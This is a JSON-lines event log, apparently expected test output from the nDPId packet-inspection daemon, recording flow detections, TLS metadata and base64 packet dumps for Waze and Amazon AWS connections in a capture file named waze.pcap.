+01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
+01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"} 
+00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
+01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUJAABAG+SHIoAQfChAlnQBQq9cOWe35LZ2QXlAR\/\/9M8QAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880577,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880577,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAA0OqdAAEAGA58KECWdyKAEMbWJAFDzNuhArgf0IIARAVuhgQAAAQEICgAIcK4TbB\/F"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodUNAABAG+Q7IoAQxChAlnQBQtYmuB\/Qg8zboQVAQ\/\/9\/2wAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodURAABAG+Q3IoAQxChAlnQBQtYmuB\/Qg8zboQVAR\/\/9\/2gAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880578,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880578,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAA04rRAAEAGW5EKECWdyKAEMaNfAFDGgz5oQX0A9YARAVvp7QAAAQEICgAIcK4TbB\/F"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUVAABAG+QzIoAQxChAlnQBQo19BfQD1xoM+aVAQ\/\/\/IRwAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUZAABAG+QvIoAQxChAlnQBQo19BfQD1xoM+aVAR\/\/\/IRgAA"} 
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880579,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880579,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAohIxAAEAG3tQKCAAByKAExrBxAFBvlik9kGnb21AR\/\/8iigAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUdAABAGHhrIoATGCggAAQBQsHGQadvbb5YpPlAQ\/\/8iigAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUhAABAGHhnIoATGCggAAQBQsHGQadvbb5YpPlAR\/\/8iiQAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880580,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880580,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAA0VK5AAEAG6ZcKECWdyKAEMc7ZAFAfHIxhueqe64ARAVv9kwAAAQEICgAIcK4TbCOv"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUlAABAG+QjIoAQxChAlnQBQztm56p7rHxyMYlAQ\/\/\/f1wAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1435587880581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAAodUpAABAG+QfIoAQxChAlnQBQztm56p7rHxyMYlAR\/\/\/f1gAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880581,"flow_last_seen":1435587880581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880581,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1435587880581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAA02RhAAEAGZS0KECWdyKAEMc4KAFB1GwfcXT3HdoARAVthCwAAAQEICgAIcK4TbCOv"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1435587880582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUtAABAG+QbIoAQxChAlnQBQzgpdPcd2dRsH3VAQ\/\/9DTwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1435587880582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUxAABAG+QXIoAQxChAlnQBQzgpdPcd2dRsH3VAR\/\/9DTgAA"} 
